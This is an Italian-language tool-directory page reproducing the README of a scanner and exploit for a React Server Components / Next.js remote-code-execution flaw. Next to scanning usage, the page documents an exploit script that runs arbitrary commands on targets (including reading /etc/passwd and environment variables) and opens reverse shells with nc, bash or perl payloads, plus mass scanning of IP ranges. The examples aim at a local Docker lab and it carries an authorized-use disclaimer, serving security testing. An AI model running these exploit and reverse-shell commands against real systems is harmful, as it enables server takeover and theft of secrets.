Skip to content
KitploitKITPLOIT
StrumentiBlog
Log in
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

FeedContattoPrivacy© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
react2shell-scanner-CVE-2025-55182 — React2shell-web-scanner | Kitploit
Strumenti/GitHubGitHub/security-phoenix-demo/react2shell-scanner-cve-2025-55182
Gestione degli Indicatori di Compromissione (IOC)Scanner di VulnerabilitàExploitSfruttamento di Applicazioni WebThreat IntelligenceEnumerazione SottodominiApprendimento e FormazioneSviluppo Payload

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Lab e Pratica
GitHubsecurity-phoenix-demo/react2shell-scanner-cve-2025-55182

react2shell-scanner-CVE-2025-55182

React2shell-web-scanner

Vedi Repository
2149 mesi faNon ancora revisionato
Condividi

React2Shell Scanner Enterprise

Scanner di vulnerabilità ad alta fedeltà per CVE-2025-55182 e CVE-2025-66478 – vulnerabilità di Esecuzione Remota di Codice in React Server Components / Next.js.

📖 Per analisi tecniche dettagliate, meccanismi di exploit e dati IOC, consulta SECURITY-RESEARCH.md


⚠️ DICHIARAZIONE DI NON RESPONSABILITÀ

Questo strumento è fornito SOLO PER SCOPI EDUCATIVI E DI TEST DI SICUREZZA AUTORIZZATI. L'accesso non autorizzato a sistemi informatici è illegale. Utilizza questi strumenti solo su sistemi di tua proprietà o per i quali hai esplicita autorizzazione scritta a testarli. Gli autori non si assumono alcuna responsabilità per un uso improprio.


🚨 Panoramica delle Vulnerabilità

CVEDescrizioneCVSS
CVE-2025-55182React Server Components Deserializzazione non sicura RCE9.8 Critico
CVE-2025-66478Next.js Server Actions RCE9.8 Critico

Pacchetti Interessati:

  • react-server-dom-webpack: 19.0.0, 19.1.0, 19.1.1, 19.2.0
  • react-server-dom-turbopack: 19.0.0, 19.1.0, 19.1.1, 19.2.0
  • react-server-dom-parcel: 19.1.0, 19.1.1, 19.2.0

Versioni Corrette:

  • 19.0.1, 19.1.2, 19.2.1 (per tutti i pacchetti)

✨ Caratteristiche

  • Input multi-target: URL singola, file host, range CIDR, range IP
  • Enumerazione di sottodomini: Scopri automaticamente i sottodomini
  • Riconoscimento della tecnologia: Rileva Next.js prima del test
  • Modalità di rilevamento sicura: Rilevamento tramite canale laterale senza esecuzione di codice
  • Verifica RCE: Prova di concetto basata su operazioni aritmetiche
  • Correlazione IOC: Verifica contro infrastrutture dannose note
  • Integrazione Phoenix Security: Carica i risultati sulla piattaforma Phoenix
  • Scansione concorrente: Multi-thread per scalare

📦 Installazione

Utilizzare uv (consigliato)

# No installation needed - uv handles dependencies
uv run react2shell-scanner -u https://example.com

Utilizzare pip

pip install requests tqdm dnspython
python3 react2shell-scanner -u https://example.com

🚀 Utilizzo

Scansione di Base

# Single URL
python3 react2shell-scanner -u https://example.com

# Safe mode (no RCE execution)
python3 react2shell-scanner -u https://example.com --safe-check

# From host file
python3 react2shell-scanner -l targets.txt -t 50 -o results.json

# CIDR range
python3 react2shell-scanner --cidr 192.168.1.0/24 --ports 80,443,3000

# Multiple CIDR ranges
python3 react2shell-scanner --cidr 10.0.0.0/24 --cidr 172.16.0.0/24

Scansione Avanzata

# Subdomain enumeration
python3 react2shell-scanner -u example.com --enumerate-subdomains

# Custom subdomain wordlist
python3 react2shell-scanner -u example.com --enumerate-subdomains \
    --subdomain-wordlist "app,api,admin,portal,staging"

# Custom paths
python3 react2shell-scanner -u https://example.com \
    --path / --path /_next --path /api

# Skip fingerprinting (scan everything)
python3 react2shell-scanner -l targets.txt --skip-fingerprint --force-scan

# Verbose with SSL disabled
python3 react2shell-scanner -u https://example.com -k -v

Integrazione con Phoenix Security

# Upload findings to Phoenix
python3 react2shell-scanner -l targets.txt \
    --upload-phoenix \
    --phoenix-config .phoenix.config

# Debug mode (save payloads)
python3 react2shell-scanner -l targets.txt \
    --upload-phoenix \
    --debug

# Upload all results (not just vulnerabilities)
python3 react2shell-scanner -l targets.txt \
    --upload-phoenix \
    --all-results

🔧 Configurazione

Configurazione di Phoenix Security

Crea .phoenix.config:

[phoenix]
client_id = your_client_id_here
client_secret = your_client_secret_here
api_base_url = https://api.demo.appsecphx.io
assessment_name = React2Shell Scanner - Web Vulnerabilities
import_type = new

Oppure usa variabili d'ambiente:

export PHOENIX_CLIENT_ID=your_client_id
export PHOENIX_CLIENT_SECRET=your_client_secret
export PHOENIX_API_URL=https://api.demo.appsecphx.io
export PHOENIX_ASSESSMENT_NAME="React2Shell Scanner"

🧪 Laboratorio di Test

Un ambiente di test basato su Docker è incluso. Vedi Lab-instructions-sample.md per un riferimento rapido.

# Start lab
cd test-lab/lab
docker-compose up -d

# Services:
# - Vulnerable: http://localhost:3011
# - Patched:    http://localhost:3012

# Test vulnerable instance (safe evidence collection)
python3 react2shell-scanner -u http://localhost:3011 -o evidence.json -e

# Test patched instance  
python3 react2shell-scanner -u http://localhost:3012 -o evidence.json -e

# Run full demo
./test-and-demo.sh --full-demo

⚠️ Nota: I comandi di sfruttamento (ad es. exploit.py -c "whoami") attivano RCE EFFETTIVA. Usare solo su container Docker locali a scopo di ricerca.

💻 Strumento Exploit (exploit.py)

Esegui comandi su target vulnerabili. Richiede Python 3.11+

Installazione

cd test-lab
pip3.11 install -r requirements.txt
# Or: pip3.11 install rich-click fake-useragent rich requests

Esempi di Esecuzione di Comandi

# Basic command execution
python3.11 exploit.py -u http://localhost:3011 -c "whoami"
# Output: nextjs

python3.11 exploit.py -u http://localhost:3011 -c "id"
# Output: uid=1001(nextjs) gid=65533(nogroup) groups=65533(nogroup)

python3.11 exploit.py -u http://localhost:3011 -c "hostname"
# Output: 99e28775bf80 (container ID)

# System enumeration
python3.11 exploit.py -u http://localhost:3011 -c "uname -a"
python3.11 exploit.py -u http://localhost:3011 -c "cat /etc/passwd"
python3.11 exploit.py -u http://localhost:3011 -c "env | head -20"

# Application reconnaissance
python3.11 exploit.py -u http://localhost:3011 -c "pwd"
# Output: /app

python3.11 exploit.py -u http://localhost:3011 -c "ls -la"
python3.11 exploit.py -u http://localhost:3011 -c "cat package.json"
python3.11 exploit.py -u http://localhost:3011 -c "node --version"

# Network information
python3.11 exploit.py -u http://localhost:3011 -c "cat /etc/hosts"
python3.11 exploit.py -u http://localhost:3011 -c "netstat -an | head -20"

# Process enumeration
python3.11 exploit.py -u http://localhost:3011 -c "ps aux"

Reverse Shell (Avanzato)

# Get Docker network gateway
GATEWAY=$(docker network inspect lab_react-rsc-lab --format '{{range .IPAM.Config}}{{.Gateway}}{{end}}')

# Start listener (in another terminal)
nc -lvnp 4444

# Launch reverse shell
python3.11 exploit.py -u http://localhost:3011 -r -l $GATEWAY -p 4444 -P nc-mkfifo

# Available payload types: nc, nc-mkfifo, sh, bash, perl

Opzioni dell'Exploit

OpzioneDescrizione
-u, --urlURL del target (obbligatorio)
-c, --cmdComando da eseguire
-r, --reverseAbilita modalità reverse shell
-l, --lhostHost di ascolto per reverse shell
-p, --lportPorta di ascolto per reverse shell
-P, --payloadTipo di payload: nc, nc-mkfifo, sh, bash, perl
--timeoutTimeout della richiesta (default: 10s)

📊 Formati di Output

Output Console

[VULNERABLE] https://vulnerable.example.com
    Status: 307
    Detection: rce_arithmetic_check
    
[IOC MATCH] 93.123.109.247
    IP 93.123.109.247 matches known malicious infrastructure
    
[NEXTJS] https://safe.example.com v15.0.0

[NOT VULN] https://other.example.com
Scarica lo strumento